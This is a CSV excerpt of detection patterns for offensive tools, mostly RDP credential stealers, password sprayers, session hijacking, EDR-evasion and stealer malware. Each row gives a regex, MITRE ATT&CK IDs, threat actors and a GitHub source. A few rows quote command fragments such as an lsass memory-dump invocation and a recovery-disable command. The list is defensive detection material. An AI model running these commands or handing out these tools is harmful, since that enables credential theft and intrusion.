"*rdp+ntlm-password://*@*",".{0,1000}rdp\+ntlm\-password\:\/\/.{0,1000}\@.{0,1000}","offensive_tool_keyword","evilrdp","Th evil twin of aardwolfgui using the aardwolf RDP client library that gives you extended control over the target and additional scripting capabilities from the command line.","T1021.001 - T1056.001 - T1113 - T1078.002 - T1105 - T1090.002 - T1059.001","TA0008 - TA0002 - TA0005 - TA0001 - TA0009 - TA0010 - TA0011","N/A","Black Basta","C2","https://github.com/skelsec/evilrdp","1","0","N/A","N/A","10","10","299","31","2025-03-15T13:37:21Z","2023-11-29T13:44:58Z","56444"
"*RDPassSpray.*.log*",".{0,1000}RDPassSpray\..{0,1000}\.log.{0,1000}","offensive_tool_keyword","RDPassSpray","Python3 tool to perform password spraying using RDP","T1110.003 - T1059.006 - T1076.001","TA0001 - TA0002 - TA0008","N/A","N/A","Exploitation tool","https://github.com/xFreed0m/RDPassSpray","1","1","#logfile","N/A","10","7","648","244","2023-08-17T15:09:50Z","2019-06-05T17:10:42Z","56445"
"*RDPassSpray.csv*",".{0,1000}RDPassSpray\.csv.{0,1000}","offensive_tool_keyword","RDPassSpray","Python3 tool to perform password spraying using RDP","T1110.003 - T1059.006 - T1076.001","TA0001 - TA0002 - TA0008","N/A","N/A","Exploitation tool","https://github.com/xFreed0m/RDPassSpray","1","1","N/A","N/A","10","7","648","244","2023-08-17T15:09:50Z","2019-06-05T17:10:42Z","56446"
"*RDPassSpray.py*",".{0,1000}RDPassSpray\.py.{0,1000}","offensive_tool_keyword","RDPassSpray","Python3 tool to perform password spraying using RDP","T1110.003 - T1059.006 - T1076.001","TA0001 - TA0002 - TA0008","N/A","N/A","Exploitation tool","https://github.com/xFreed0m/RDPassSpray","1","1","N/A","N/A","10","7","648","244","2023-08-17T15:09:50Z","2019-06-05T17:10:42Z","56447"
"*RDPassSpray-main*",".{0,1000}RDPassSpray\-main.{0,1000}","offensive_tool_keyword","RDPassSpray","Python3 tool to perform password spraying using RDP","T1110.003 - T1059.006 - T1076.001","TA0001 - TA0002 - TA0008","N/A","N/A","Exploitation tool","https://github.com/xFreed0m/RDPassSpray","1","0","N/A","N/A","10","7","648","244","2023-08-17T15:09:50Z","2019-06-05T17:10:42Z","56448"
"*RDPassSpray-master*",".{0,1000}RDPassSpray\-master.{0,1000}","offensive_tool_keyword","RDPassSpray","Python3 tool to perform password spraying using RDP","T1110.003 - T1059.006 - T1076.001","TA0001 - TA0002 - TA0008","N/A","N/A","Exploitation tool","https://github.com/xFreed0m/RDPassSpray","1","1","N/A","N/A","10","7","648","244","2023-08-17T15:09:50Z","2019-06-05T17:10:42Z","56449"
"*rdpbrute.py*",".{0,1000}rdpbrute\.py.{0,1000}","offensive_tool_keyword","RedTeam_toolkit","Red Team Toolkit is an Open-Source Django Offensive Web-App which is keeping the useful offensive tools used in the red-teaming together","T1083 - T1065 - T1204 - T1087 - T1203","TA0007 - TA0005 - TA0001","N/A","N/A","Reconnaissance","https://github.com/signorrayan/RedTeam_toolkit","1","1","N/A","N/A","N/A","6","561","121","2025-03-28T06:59:25Z","2021-08-18T08:58:14Z","56450"
"*RDP-Caching.ps1*",".{0,1000}RDP\-Caching\.ps1.{0,1000}","offensive_tool_keyword","AutoRDPwn","AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers","T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002","TA0004 - TA0003 - TA0006 - TA0002 - TA0008","N/A","N/A","Framework","https://github.com/JoelGMSec/AutoRDPwn","1","1","N/A","N/A","10","10","1103","499","2022-09-04T20:44:27Z","2018-07-29T08:22:20Z","56451"
"*RDPCredentialStealer.zip*",".{0,1000}RDPCredentialStealer\.zip.{0,1000}","offensive_tool_keyword","RDPCredentialStealer","RDPCredentialStealer it's a malware that steal credentials provided by users in RDP using API Hooking with Detours in C++","T1555.001 - T1059.002 - T1552.002","TA0006 - TA0002 - TA0004","N/A","N/A","Credential Access","https://github.com/S12cybersecurity/RDPCredentialStealer","1","1","N/A","N/A","10","3","245","37","2023-06-14T10:25:33Z","2023-06-13T01:30:26Z","56452"
"*RDPCredentialStealer-main*",".{0,1000}RDPCredentialStealer\-main.{0,1000}","offensive_tool_keyword","RDPCredentialStealer","RDPCredentialStealer it's a malware that steal credentials provided by users in RDP using API Hooking with Detours in C++","T1555.001 - T1059.002 - T1552.002","TA0006 - TA0002 - TA0004","N/A","N/A","Credential Access","https://github.com/S12cybersecurity/RDPCredentialStealer","1","1","N/A","N/A","10","3","245","37","2023-06-14T10:25:33Z","2023-06-13T01:30:26Z","56453"
"*RDPCredsStealerDLL.*",".{0,1000}RDPCredsStealerDLL\..{0,1000}","offensive_tool_keyword","RDPCredentialStealer","RDPCredentialStealer it's a malware that steal credentials provided by users in RDP using API Hooking with Detours in C++","T1555.001 - T1059.002 - T1552.002","TA0006 - TA0002 - TA0004","N/A","N/A","Credential Access","https://github.com/S12cybersecurity/RDPCredentialStealer","1","1","N/A","N/A","10","3","245","37","2023-06-14T10:25:33Z","2023-06-13T01:30:26Z","56454"
"*RDPCredsStealerDLL.dll*",".{0,1000}RDPCredsStealerDLL\.dll.{0,1000}","offensive_tool_keyword","RDPCredentialStealer","RDPCredentialStealer it's a malware that steal credentials provided by users in RDP using API Hooking with Detours in C++","T1555.001 - T1059.002 - T1552.002","TA0006 - TA0002 - TA0004","N/A","N/A","Credential Access","https://github.com/S12cybersecurity/RDPCredentialStealer","1","1","N/A","N/A","10","3","245","37","2023-06-14T10:25:33Z","2023-06-13T01:30:26Z","56455"
"*rdphijack.*",".{0,1000}rdphijack\..{0,1000}","offensive_tool_keyword","RDPHijack-BOF","BOF - RDPHijack - Cobalt Strike Beacon Object File (BOF) that uses WinStationConnect API to perform local/remote RDP session hijacking.","T1021 - T1021.002 - T1032 - T1055 - T1070 - T1070.006 - T1070.007 - T1574.001","TA0002 - TA0003 - TA0004","N/A","N/A","Lateral Movement","https://github.com/netero1010/RDPHijack-BOF","1","1","N/A","N/A","N/A","3","298","46","2022-07-08T10:14:32Z","2022-07-08T10:14:07Z","56456"
"*rdphijack.x64*",".{0,1000}rdphijack\.x64.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Beacon Object File (BOF) that uses WinStationConnect API to perform local/remote RDP session hijacking.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/netero1010/RDPHijack-BOF","1","1","N/A","N/A","10","3","298","46","2022-07-08T10:14:32Z","2022-07-08T10:14:07Z","56457"
"*rdphijack.x64.*",".{0,1000}rdphijack\.x64\..{0,1000}","offensive_tool_keyword","RDPHijack-BOF","BOF - RDPHijack - Cobalt Strike Beacon Object File (BOF) that uses WinStationConnect API to perform local/remote RDP session hijacking.","T1021 - T1021.002 - T1032 - T1055 - T1070 - T1070.006 - T1070.007 - T1574.001","TA0002 - TA0003 - TA0004","N/A","N/A","Lateral Movement","https://github.com/netero1010/RDPHijack-BOF","1","1","N/A","N/A","N/A","3","298","46","2022-07-08T10:14:32Z","2022-07-08T10:14:07Z","56458"
"*rdphijack.x86*",".{0,1000}rdphijack\.x86.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Beacon Object File (BOF) that uses WinStationConnect API to perform local/remote RDP session hijacking.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/netero1010/RDPHijack-BOF","1","1","N/A","N/A","10","3","298","46","2022-07-08T10:14:32Z","2022-07-08T10:14:07Z","56459"
"*rdphijack.x86.*",".{0,1000}rdphijack\.x86\..{0,1000}","offensive_tool_keyword","RDPHijack-BOF","BOF - RDPHijack - Cobalt Strike Beacon Object File (BOF) that uses WinStationConnect API to perform local/remote RDP session hijacking.","T1021 - T1021.002 - T1032 - T1055 - T1070 - T1070.006 - T1070.007 - T1574.001","TA0002 - TA0003 - TA0004","N/A","N/A","Lateral Movement","https://github.com/netero1010/RDPHijack-BOF","1","1","N/A","N/A","N/A","3","298","46","2022-07-08T10:14:32Z","2022-07-08T10:14:07Z","56460"
"*RDPHijack-BOF*",".{0,1000}RDPHijack\-BOF.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Beacon Object File (BOF) that uses WinStationConnect API to perform local/remote RDP session hijacking.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/netero1010/RDPHijack-BOF","1","1","N/A","N/A","10","3","298","46","2022-07-08T10:14:32Z","2022-07-08T10:14:07Z","56461"
"*RDPHijack-BOF*",".{0,1000}RDPHijack\-BOF.{0,1000}","offensive_tool_keyword","RDPHijack-BOF","BOF - RDPHijack - Cobalt Strike Beacon Object File (BOF) that uses WinStationConnect API to perform local/remote RDP session hijacking.","T1021 - T1021.002 - T1032 - T1055 - T1070 - T1070.006 - T1070.007 - T1574.001","TA0002 - TA0003 - TA0004","N/A","N/A","Lateral Movement","https://github.com/netero1010/RDPHijack-BOF","1","1","N/A","N/A","N/A","3","298","46","2022-07-08T10:14:32Z","2022-07-08T10:14:07Z","56462"
"*RDPInception*",".{0,1000}RDPInception.{0,1000}","offensive_tool_keyword","RDPInception","A proof of concept for the RDP Inception Attack","T1188 - T1214 - T1555.003","TA0007 - TA0008 - TA0002","N/A","N/A","Exploitation tool","https://github.com/mdsecactivebreach/RDPInception","1","1","N/A","N/A","N/A","4","347","325","2017-06-29T16:57:25Z","2017-06-29T10:08:23Z","56463"
"*RDPKeylog.exe*",".{0,1000}RDPKeylog\.exe.{0,1000}","offensive_tool_keyword","Amnesiac","Amnesiac is a post-exploitation framework entirely written in PowerShell and designed to assist with Lateral Movement within Active Directory environments","T1021.002 - T1550.002","TA0008","N/A","Black Basta","Framework","https://github.com/Leo4j/Amnesiac","1","1","N/A","N/A","10","5","415","63","2025-03-18T09:32:04Z","2023-10-31T15:06:25Z","56464"
"*RDPReplayer.py*",".{0,1000}RDPReplayer\.py.{0,1000}","offensive_tool_keyword","pyrdp","RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact","T1550.002 - T1059.006 - T1071.001","TA0002 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/GoSecure/pyrdp","1","1","N/A","can also be used by blueteam as a honeypot","10","10","1663","257","2025-03-13T05:11:26Z","2018-09-07T19:17:41Z","56465"
"*rdpscraper*",".{0,1000}rdpscraper.{0,1000}","offensive_tool_keyword","rdpscraper","rdpscraper - Enumerates users based off RDP Screenshots","T1110 - T1189 - T1056.001","TA0006 - TA0008 - TA0011","N/A","N/A","Reconnaissance","https://github.com/x90skysn3k/rdpscraper","1","1","N/A","N/A","N/A","1","34","15","2023-10-25T21:17:52Z","2017-07-19T17:02:24Z","56466"
"*RDPSpray*",".{0,1000}RDPSpray.{0,1000}","offensive_tool_keyword","RDPSpray","Tool for password spraying RDP","T1110.001 - T1555.002","TA0006 - TA0040 - TA0003","N/A","N/A","Credential Access","https://github.com/dafthack/RDPSpray","1","1","N/A","N/A","N/A","1","95","28","2018-10-12T18:32:51Z","2018-10-12T18:29:52Z","56467"
"*RDPStrike enabled*",".{0,1000}RDPStrike\senabled.{0,1000}","offensive_tool_keyword","RdpStrike","Positional Independent Code to extract clear text password from mstsc.exe using API Hooking via HWBP","T1081 - T1055.011 - T1012 - T1113 - T1040 - T1185","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/0xEr3bus/RdpStrike","1","0","N/A","N/A","10","3","238","27","2024-06-11T19:40:05Z","2024-06-11T19:31:50Z","56468"
"*RdpStrike.x64.bin*",".{0,1000}RdpStrike\.x64\.bin.{0,1000}","offensive_tool_keyword","RdpStrike","Positional Independent Code to extract clear text password from mstsc.exe using API Hooking via HWBP","T1081 - T1055.011 - T1012 - T1113 - T1040 - T1185","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/0xEr3bus/RdpStrike","1","1","N/A","N/A","10","3","238","27","2024-06-11T19:40:05Z","2024-06-11T19:31:50Z","56469"
"*RdpThief enabled *",".{0,1000}RdpThief\senabled\s.{0,1000}","offensive_tool_keyword","RdpThief","Extracting Clear Text Passwords from mstsc.exe using API Hooking.","T1056.004 - T1110 - T1563.002","TA0006 - TA0043","N/A","N/A","Credential Access","https://github.com/0x09AL/RdpThief","1","0","#content","N/A","10","10","1311","361","2024-07-20T06:58:02Z","2019-11-03T17:54:38Z","56470"
"*RdpThief.*",".{0,1000}RdpThief\..{0,1000}","offensive_tool_keyword","cobaltstrike","Erebus CobaltStrike post penetration testing plugin","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/DeEpinGh0st/Erebus","1","1","N/A","N/A","10","10","1518","221","2021-10-28T06:20:51Z","2019-09-26T09:32:00Z","56471"
"*RdpThief.dll*",".{0,1000}RdpThief\.dll.{0,1000}","offensive_tool_keyword","RdpThief","Extracting Clear Text Passwords from mstsc.exe using API Hooking.","T1056.004 - T1110 - T1563.002","TA0006 - TA0043","N/A","N/A","Credential Access","https://github.com/0x09AL/RdpThief","1","1","N/A","N/A","10","10","1311","361","2024-07-20T06:58:02Z","2019-11-03T17:54:38Z","56472"
"*RdpThief.exe*",".{0,1000}RdpThief\.exe.{0,1000}","offensive_tool_keyword","RdpThief","Extracting Clear Text Passwords from mstsc.exe using API Hooking.","T1056.004 - T1110 - T1563.002","TA0006 - TA0043","N/A","N/A","Credential Access","https://github.com/0x09AL/RdpThief","1","1","N/A","N/A","10","10","1311","361","2024-07-20T06:58:02Z","2019-11-03T17:54:38Z","56473"
"*RdpThief_x64.tmp*",".{0,1000}RdpThief_x64\.tmp.{0,1000}","offensive_tool_keyword","RdpThief","Extracting Clear Text Passwords from mstsc.exe using API Hooking.","T1056.004 - T1110 - T1563.002","TA0006 - TA0043","N/A","N/A","Credential Access","https://github.com/0x09AL/RdpThief","1","0","N/A","N/A","10","10","1311","361","2024-07-20T06:58:02Z","2019-11-03T17:54:38Z","56474"
"*rdrleakdiag.exe -p (Get-Process lsass)*",".{0,1000}rdrleakdiag\.exe\s\-p\s\(Get\-Process\slsass\).{0,1000}","offensive_tool_keyword","lsassy","Extract credentials from lsass remotely","T1003.001 - T1021.001 - T1021.002 - T1555.003","TA0006","N/A","N/A","Credential Access","https://github.com/login-securite/lsassy","1","0","N/A","N/A","10","10","2105","251","2024-12-31T11:56:19Z","2019-12-03T14:03:41Z","56478"
"*rdrleakdiag.py*",".{0,1000}rdrleakdiag\.py.{0,1000}","offensive_tool_keyword","lsassy","Extract credentials from lsass remotely","T1003.001 - T1021.001 - T1021.002 - T1555.003","TA0006","N/A","N/A","Credential Access","https://github.com/login-securite/lsassy","1","1","N/A","N/A","10","10","2105","251","2024-12-31T11:56:19Z","2019-12-03T14:03:41Z","56479"
"*read_cs_teamserver*",".{0,1000}read_cs_teamserver.{0,1000}","offensive_tool_keyword","cobaltstrike","generate CobaltStrike's cross-platform payload","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/gloxec/CrossC2","1","1","N/A","N/A","10","10","2383","352","2023-11-20T10:54:46Z","2020-01-16T16:39:09Z","56483"
"*README-FILE-#COMPUTER#-#TIME#.hta*",".{0,1000}README\-FILE\-\#COMPUTER\#\-\#TIME\#\.hta.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","0","N/A","ransom notes","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","56486"
"*readShellcode*",".{0,1000}readShellcode.{0,1000}","offensive_tool_keyword","C2 related tools","Thread Stack Spoofing - PoC for an advanced In-Memory evasion technique allowing to better hide injected shellcode's memory allocation from scanners and analysts.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/mgeeky/ThreadStackSpoofer","1","1","N/A","N/A","10","10","1109","180","2022-06-17T18:06:35Z","2021-09-26T22:48:17Z","56487"
"*ReadyToPhish.xls*",".{0,1000}ReadyToPhish\.xls.{0,1000}","offensive_tool_keyword","Macrome","An Excel Macro Document Reader/Writer for Red Teamers & Analysts. Blog posts describing what this tool actually does can be found https://malware.pizza/2020/05/12/evading-av-with-excel-macros-and-biff8-xls/ and https://malware.pizza/2020/06/19/further-evasion-in-the-forgotten-corners-of-ms-xls/","T1140","TA0005","N/A","N/A","Exploitation tool","https://github.com/michaelweber/Macrome","1","1","N/A","N/A","N/A","6","520","79","2022-02-01T16:26:13Z","2020-05-07T22:44:11Z","56488"
"*reagentc /disable >nul*",".{0,1000}reagentc\s\/disable\s\>nul.{0,1000}","offensive_tool_keyword","Fentanyl","Stealer Malware - Steal Discord Tokens (+ Much More Info) - Steal Passwords/Cookies/History/Credit Cards/Phone Numbers and Addresses from all Browsers (Profile Support) - Steal PC Info - Steal Video Game Accounts (Adding more games + wallets and VPN's) - Low Detections - Anti VM - Sort of Fast - Startup - IP Logger","T1547.001 - T1552.001 - T1552.005 - T1110.001 - T1082 - T1562.001 - T1574.002 - T1529 - T1497.001 - T1543.003 - T1592.001","TA0005 - TA0006 - TA0040 - TA0003 - TA0009","N/A","N/A","Malware","https://github.com/dekrypted/Fentanyl","1","0","N/A","N/A","10","","N/A","","","","56489"
"*RealBey/ThisIsNotRat*",".{0,1000}RealBey\/ThisIsNotRat.{0,1000}","offensive_tool_keyword","ThisIsNotRat","control windows computeur from telegram","T1098 - T1079 - T1105 - T1047 - T1059","TA0010 - TA0009 - TA0002 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/RealBey/ThisIsNotRat","1","1","N/A","N/A","9","10","64","17","2023-09-10T07:39:38Z","2023-09-07T14:07:32Z","56490"
"*RealBlindingEDR.cpp*",".{0,1000}RealBlindingEDR\.cpp.{0,1000}","offensive_tool_keyword","RealBlindingEDR","AV/EDR evasion","T1562.001 - T1548.001","TA0005 - TA0004","N/A","N/A","Defense Evasion","https://github.com/myzxcg/RealBlindingEDR","1","1","N/A","N/A","10","10","1050","190","2024-06-21T03:16:55Z","2023-10-28T07:06:53Z","56491"
"*RealBlindingEDR.exe*",".{0,1000}RealBlindingEDR\.exe.{0,1000}","offensive_tool_keyword","RealBlindingEDR","AV/EDR evasion","T1562.001 - T1548.001","TA0005 - TA0004","N/A","N/A","Defense Evasion","https://github.com/myzxcg/RealBlindingEDR","1","1","N/A","N/A","10","10","1050","190","2024-06-21T03:16:55Z","2023-10-28T07:06:53Z","56492"
"*RealBlindingEDR.h*",".{0,1000}RealBlindingEDR\.h.{0,1000}","offensive_tool_keyword","RealBlindingEDR","AV/EDR evasion","T1562.001 - T1548.001","TA0005 - TA0004","N/A","N/A","Defense Evasion","https://github.com/myzxcg/RealBlindingEDR","1","0","N/A","N/A","10","10","1050","190","2024-06-21T03:16:55Z","2023-10-28T07:06:53Z","56493"
"*RealBlindingEDR/releases*",".{0,1000}RealBlindingEDR\/releases.{0,1000}","offensive_tool_keyword","RealBlindingEDR","AV/EDR evasion","T1562.001 - T1548.001","TA0005 - TA0004","N/A","N/A","Defense Evasion","https://github.com/myzxcg/RealBlindingEDR","1","1","N/A","N/A","10","10","1050","190","2024-06-21T03:16:55Z","2023-10-28T07:06:53Z","56494"
"*Real-Passwords*",".{0,1000}Real\-Passwords.{0,1000}","offensive_tool_keyword","Probable-Wordlists","Password wordlists","T1110 - T1114","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/berzerk0/Probable-Wordlists","1","1","N/A","N/A","9","10","8895","1608","2023-10-04T20:22:09Z","2017-04-16T17:08:27Z","56495"
"*Reaper.exe kp *",".{0,1000}Reaper\.exe\skp\s.{0,1000}","offensive_tool_keyword","reaper","Reaper is a proof-of-concept designed to exploit BYOVD (Bring Your Own Vulnerable Driver) driver vulnerability. This malicious technique involves inserting a legitimate - vulnerable driver into a target system - which allows attackers to exploit the driver to perform malicious actions.","T1547.009 - T1215 - T1129 - T1548.002","TA0002 - TA0003 - TA0040 - TA0005","N/A","N/A","Defense Evasion","https://github.com/MrEmpy/Reaper","1","0","N/A","N/A","10","2","158","34","2024-12-07T01:52:58Z","2023-09-21T02:09:48Z","56499"
"*Reaper.exe sp *",".{0,1000}Reaper\.exe\ssp\s.{0,1000}","offensive_tool_keyword","reaper","Reaper is a proof-of-concept designed to exploit BYOVD (Bring Your Own Vulnerable Driver) driver vulnerability. This malicious technique involves inserting a legitimate - vulnerable driver into a target system - which allows attackers to exploit the driver to perform malicious actions.","T1547.009 - T1215 - T1129 - T1548.002","TA0002 - TA0003 - TA0040 - TA0005","N/A","N/A","Defense Evasion","https://github.com/MrEmpy/Reaper","1","0","N/A","N/A","10","2","158","34","2024-12-07T01:52:58Z","2023-09-21T02:09:48Z","56500"
